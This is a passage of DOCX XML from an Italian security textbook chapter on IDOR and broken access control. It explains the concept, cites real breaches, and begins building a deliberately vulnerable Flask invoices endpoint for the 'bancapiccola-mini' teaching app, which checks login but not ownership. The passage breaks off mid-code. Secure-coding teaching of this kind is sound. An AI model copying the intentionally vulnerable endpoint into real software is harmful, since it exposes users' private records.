        <w:t xml:space="preserve">Le tre lavorano insieme. L’autenticazione senza autorizzazione lascia tutti i porti aperti. L’autorizzazione senza autenticazione è impossibile (non sai chi controllare). E senza l’auditing non puoi mai sapere, dopo un incidente, cosa è realmente successo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="251"/>
    <w:bookmarkStart w:id="252" w:name="il-caso-pratico"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il caso pratico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consideriamo un endpoint di un’applicazione bancaria:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/fatture/42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il programmatore alle prime armi pensa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Se l’utente è loggato, può vedere la fattura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. E scrive:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/fatture/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vedi_fattura(fattura_id):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                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ autenticato?</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> get_fattura(fattura_id)                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ autorizzato?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il primo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">controlla l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autenticazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: c’è un utente loggato? Bene. Ma manca completamente la verifica di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’utente loggato ha il diritto di vedere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">proprio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la fattura numero 42, o quella appartiene a qualcun altro?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Senza questo secondo controllo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiunque sia loggato può vedere le fatture di chiunque altro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Basta cambiare il numero nell’URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa è la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la classica manifestazione di Broken Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="252"/>
    <w:bookmarkEnd w:id="253"/>
    <w:bookmarkStart w:id="258" w:name="cosè-un-idor"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="512" w:name="sec_6_2"/>
      <w:r>
        <w:t xml:space="preserve">6.2 Cos’è un IDOR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="512"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sta per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Direct Object Reference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">riferimento diretto a un oggetto, non sicuro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. In italiano si potrebbe tradurre con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">riferimento diretto vulnerabile a un oggetto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma nel mondo professionale si usa universalmente l’acronimo inglese.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="254" w:name="la-definizione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La definizione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vulnerabilità IDOR esiste quando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’applicazione espone un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">riferimento diretto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a un oggetto interno (un identificatore di database, un nome di file, una chiave) attraverso un parametro che il client può modificare (URL, body, header).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non verifica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che l’utente che fa la richiesta sia autorizzato ad accedere a quell’oggetto specifico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risultato: cambiando il riferimento, l’utente accede a oggetti che non gli appartengono.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’esempio canonico è quello che hai visto un attimo fa: un endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/fatture/&lt;id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che restituisce la fattura corrispondente al</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">senza verificare la proprietà.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="254"/>
    <w:bookmarkStart w:id="255" w:name="perché-è-così-diffuso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perché è così diffuso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tre ragioni convergenti:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’URL è leggibile e modificabile.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Niente di tecnicamente sofisticato: chiunque sa cambiare un numero in un indirizzo. Lo fa anche un visitatore curioso che non sta affatto cercando di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attaccare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">I framework non aiutano.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mentre per la SQL Injection esistono meccanismi automatici (le query parametrizzate dei driver di database), per il controllo di autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non esiste un meccanismo automatico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ogni endpoint deve scriversi il proprio controllo a mano. Si dimentica facilmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">I test funzionali non lo rilevano.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quando un programmatore testa il proprio codice, lo fa col proprio account: chiede</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fatture/X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dove X è una sua fattura. Vede che funziona. Non gli viene in mente di provare con la fattura di un altro, perché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tanto l’utente loggato vede solo le sue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lo pensa, ma non lo verifica nel codice.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="255"/>
    <w:bookmarkStart w:id="256" w:name="una-statistica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una statistica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I dati OWASP per la 2025 indicano che il 3,73% delle applicazioni testate ha almeno un Broken Access Control. Ma uno studio del 2024 di Rapid7 — che ha analizzato 2.500 applicazioni reali in produzione — ha rilevato IDOR sfruttabili nel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">94%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delle applicazioni esaminate. La differenza fra le due cifre dipende dal metodo: gli scanner automatici trovano il 4% perché un controllo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mancante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non si vede nel codice; i tester umani trovano il 94% perché loro provano a cambiare gli ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In altre parole: se non testi specificamente per IDOR, è quasi certo che la tua applicazione ne abbia.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="256"/>
    <w:bookmarkStart w:id="257" w:name="casi-reali"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Casi reali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">First American Financial Corp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, maggio 2019:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">885 milioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di documenti (atti notarili, dichiarazioni dei redditi, scansioni di carte d’identità) esposti tramite IDOR. Cambiando un numero nell’URL del sito si navigavano tutti i documenti del cliente successivo. Senza autenticazione. Multa successiva di 487.000 dollari da parte della SEC nel 2021 (cifra ridotta in considerazione della cooperazione).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Parler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, gennaio 2021: tutte le foto, video e geolocalizzazioni degli utenti scaricabili per ID sequenziali, senza autenticazione. Una ricercatrice ha esfiltrato l’intero database in pochi giorni. Caso famoso perché, oltre alla violazione di privacy, ha portato a indagini su partecipanti all’assalto al Campidoglio USA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Optus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, settembre 2022: API che restituiva dati personali (nome, indirizzo, documenti d’identità) di clienti incrementando un ID nell’URL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">9,8 milioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di clienti australiani esposti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">T-Mobile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, gennaio 2023: API mal protetta permetteva di estrarre dati di account altrui.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">37 milioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di clienti esposti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quattro disastri, tutti causati da un controllo di autorizzazione dimenticato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="257"/>
    <w:bookmarkEnd w:id="258"/>
    <w:bookmarkStart w:id="261" w:name="X8f8fc2b065d1777a65b98d7538ecdf8efc67db3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="513" w:name="sec_6_3"/>
      <w:r>
        <w:t xml:space="preserve">6.3 Estendiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con le fatture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per vedere l’IDOR all’opera, estendiamo l’app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> aggiungendo una sezione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fatture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Lo studente Mario, una volta loggato, potrà vedere le sue fatture. Ma l’endpoint sarà</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabile a IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="259" w:name="modifiche-al-codice"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modifiche al codice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le query SQL del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> le abbiamo già corrette</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con i parametri (</w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_5_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 5.7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), quindi partiamo da lì. Ora aggiungiamo le fatture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modifica 1 — aggiungi una tabella</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">fatture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nella funzione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">init_db()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dentro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">init_db()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, prima di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, aggiungi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE TABLE IF NOT EXISTS fatture (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            utente_id INTEGER NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            descrizione TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            importo REAL NOT NULL,</w:t>
